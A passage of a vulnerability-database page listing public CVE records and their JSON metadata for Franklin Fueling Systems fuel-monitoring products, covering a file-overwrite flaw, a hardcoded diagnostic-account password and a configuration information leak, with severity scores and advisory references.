            "providerMetadata": {
              "dateUpdated": "2024-08-03T13:47:05.502Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://pastebin.com/raw/64stbsWu"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 9.8,
                  "baseSeverity": "CRITICAL",
                  "confidentialityImpact": "HIGH",
                  "integrityImpact": "HIGH",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2022-44039",
                    "options": [
                      {
                        "Exploitation": "poc"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-04-24T13:54:59.273366Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "problemTypes": [
              {
                "descriptions": [
                  {
                    "cweId": "CWE-863",
                    "description": "CWE-863 Incorrect Authorization",
                    "lang": "en",
                    "type": "CWE"
                  }
                ]
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-04-24T13:55:15.058Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Franklin Fueling System FFS Colibri 1.9.22.8925 is affected by: File system overwrite. The impact is: File system rewrite (remote). \u00b6\u00b6 An attacker can overwrite system files like [system.conf] and [passwd], this occurs because the insecure usage of \"fopen\" system function with the mode \"wb\" which allows overwriting file if exists. Overwriting files such as passwd, allows an attacker to escalate his privileges by planting backdoor user with root privilege or change root password."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-12-05T00:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "url": "https://pastebin.com/raw/64stbsWu"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2022-44039",
        "datePublished": "2022-12-05T00:00:00.000Z",
        "dateReserved": "2022-10-30T00:00:00.000Z",
        "dateUpdated": "2025-04-24T13:55:15.058Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-7248 (GCVE-0-2013-7248)

    Vulnerability from nvd – Published: 2014-01-26 01:00 – Updated: 2024-08-06 18:01
    Summary
    Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2014-01-03 00:00

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T18:01:19.723Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2014-01-03T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2014-01-26T00:57:01.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-7248",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt",
                  "refsource": "MISC",
                  "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-7248",
        "datePublished": "2014-01-26T01:00:00.000Z",
        "dateReserved": "2013-12-31T00:00:00.000Z",
        "dateUpdated": "2024-08-06T18:01:19.723Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-7247 (GCVE-0-2013-7247)

    Vulnerability from nvd – Published: 2014-01-26 01:00 – Updated: 2024-08-06 18:01
    Summary
    cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2014-01-03 00:00

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T18:01:19.818Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2014-01-03T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2014-01-26T00:57:01.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-7247",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt",
                  "refsource": "MISC",
                  "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-7247",
        "datePublished": "2014-01-26T01:00:00.000Z",
        "dateReserved": "2013-12-31T00:00:00.000Z",
        "dateUpdated": "2024-08-06T18:01:19.818Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-44039 (GCVE-0-2022-44039)

    Vulnerability from cvelistv5 – Published: 2022-12-05 00:00 – Updated: 2025-04-24 13:55
    VLAI
    Summary
    Franklin Fueling System FFS Colibri 1.9.22.8925 is affected by: File system overwrite. The impact is: File system rewrite (remote). An attacker can overwrite system files such as [system.conf] and [passwd]. This occurs because of the insecure use of the "fopen" system function with the mode "wb", which allows an existing file to be overwritten. Overwriting files such as passwd allows an attacker to escalate privileges by planting a backdoor user with root privileges or by changing the root password.
    SSVC
    Exploitation: poc Automatable: yes Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • n/a
    • CWE-863 - Incorrect Authorization
    Assigner
    References

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T13:47:05.502Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://pastebin.com/raw/64stbsWu"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 9.8,
                  "baseSeverity": "CRITICAL",
                  "confidentialityImpact": "HIGH",
                  "integrityImpact": "HIGH",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2022-44039",
                    "options": [
                      {
                        "Exploitation": "poc"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-04-24T13:54:59.273366Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "problemTypes": [
              {
                "descriptions": [
                  {
                    "cweId": "CWE-863",
                    "description": "CWE-863 Incorrect Authorization",
                    "lang": "en",
                    "type": "CWE"
                  }
                ]
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-04-24T13:55:15.058Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Franklin Fueling System FFS Colibri 1.9.22.8925 is affected by: File system overwrite. The impact is: File system rewrite (remote). \u00b6\u00b6 An attacker can overwrite system files like [system.conf] and [passwd], this occurs because the insecure usage of \"fopen\" system function with the mode \"wb\" which allows overwriting file if exists. Overwriting files such as passwd, allows an attacker to escalate his privileges by planting backdoor user with root privilege or change root password."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-12-05T00:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "url": "https://pastebin.com/raw/64stbsWu"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2022-44039",
        "datePublished": "2022-12-05T00:00:00.000Z",
        "dateReserved": "2022-10-30T00:00:00.000Z",
        "dateUpdated": "2025-04-24T13:55:15.058Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-7248 (GCVE-0-2013-7248)

    Vulnerability from cvelistv5 – Published: 2014-01-26 01:00 – Updated: 2024-08-06 18:01
    VLAI
    Summary
    Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2014-01-03 00:00

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T18:01:19.723Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2014-01-03T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2014-01-26T00:57:01.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-7248",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt",
                  "refsource": "MISC",
                  "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-7248",
        "datePublished": "2014-01-26T01:00:00.000Z",
        "dateReserved": "2013-12-31T00:00:00.000Z",
        "dateUpdated": "2024-08-06T18:01:19.723Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-7247 (GCVE-0-2013-7247)

    Vulnerability from cvelistv5 – Published: 2014-01-26 01:00 – Updated: 2024-08-06 18:01
    VLAI
    Summary
    cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2014-01-03 00:00

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T18:01:19.818Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2014-01-03T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2014-01-26T00:57:01.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-7247",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt",
                  "refsource": "MISC",
                  "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-7247",
        "datePublished": "2014-01-26T01:00:00.000Z",
        "dateReserved": "2013-12-31T00:00:00.000Z",
        "dateUpdated": "2024-08-06T18:01:19.818Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }